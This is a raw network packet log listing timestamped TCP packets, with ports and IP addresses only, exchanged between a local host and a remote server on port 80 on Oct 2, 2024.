Oct 2, 2024 09:41:25.959203959 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959234953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959265947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959278107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959278107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959278107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959278107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959297895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959330082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959363937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959417105 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959417105 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959417105 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959423065 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959455013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959486008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959521055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959548950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959563971 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959563971 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959563971 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959563971 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959579945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959613085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959642887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959675074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959705114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959719896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959719896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959719896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959719896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959737062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959767103 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959772110 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959803104 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959834099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959851027 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959851027 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959851027 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959865093 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959896088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959928989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959959030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959990025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.960019112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.960019112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.960019112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.960019112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.960021019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.960052967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.960086107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.960114002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.960128069 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.960141897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.960154057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.960154057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.960154057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.960154057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.960155010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.960170031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.960391998 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.960391998 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.044663906 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.044692039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.044713974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.044727087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.044742107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.044754982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.044770002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.044784069 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.044799089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.044826984 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.044826984 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.044826984 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.044872999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.044887066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.044900894 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.044914007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.044928074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.044940948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.044955015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.044955015 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.044955015 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.044955015 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.044955015 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.044970036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045159101 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045159101 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045289040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045303106 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045315981 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045329094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045344114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045356989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045377970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045391083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045404911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045408010 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045408010 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045408010 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045408010 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045418024 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045432091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045445919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045459986 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045474052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045486927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045500994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045515060 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045517921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045517921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045517921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045517921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045528889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045552015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045566082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045579910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045593023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045644999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045651913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045651913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045651913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045651913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045659065 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045672894 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045686007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045701027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045751095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045751095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045751095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045782089 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.045908928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045923948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045938015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.045968056 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046065092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046078920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046091080 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046112061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046133041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046144962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046159029 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046173096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046173096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046173096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046173096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046173096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046186924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046200991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046236038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046248913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046295881 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046295881 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046295881 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046295881 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046478033 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046500921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046514034 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046535015 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046593904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046607971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046622038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046636105 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046658993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046658993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046710014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046724081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046737909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046752930 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046773911 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046773911 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046801090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046814919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046828985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046844006 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046855927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046855927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046855927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046855927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046919107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046919107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.046950102 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046962976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046977043 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.046998024 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047013044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047027111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047076941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047076941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047076941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047116995 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047130108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047143936 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047158957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047173023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047188044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047202110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047214985 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047214985 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047214985 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047214985 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047252893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047267914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047326088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047338963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047353983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047373056 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047373056 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047373056 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047394037 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047461033 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047475100 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047487974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047501087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047514915 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047529936 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047560930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047560930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047560930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047600985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047616005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047669888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047683954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047698021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047712088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047722101 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047722101 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047722101 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047725916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047739983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047769070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047769070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047800064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047812939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047826052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047847986 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047863007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047877073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047890902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047904015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.047904968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047904968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047904968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.047971964 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.133584976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133598089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133613110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133620977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133630991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133639097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133649111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133667946 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.133667946 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.133774042 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133783102 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133793116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133800983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133810997 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133830070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.133830070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.133896112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.133896112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.133919954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133929014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133938074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133945942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133953094 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.133955956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133964062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133974075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133981943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.133991003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.134040117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.134040117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.135241985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135298014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135315895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135341883 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135354996 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135370970 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.135370970 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.135401011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.135411024 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.135421038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135428905 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135438919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135471106 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135479927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135488033 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135497093 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135535955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.135535955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.135551929 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.135617018 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135624886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135633945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135643005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135674953 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.135746956 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.135752916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135761976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135770082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135783911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135792971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135801077 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135808945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135817051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135826111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.135850906 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.135850906 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.135864973 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.136025906 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136034966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136044025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136053085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136061907 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136070967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136079073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136086941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136101007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136109114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136117935 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136121988 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.136121988 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.136126041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136132956 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.136135101 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136143923 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136152983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136224985 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.136224985 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.136224985 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.136413097 CEST	80	49749	46.8.231.109	192.168.2.4
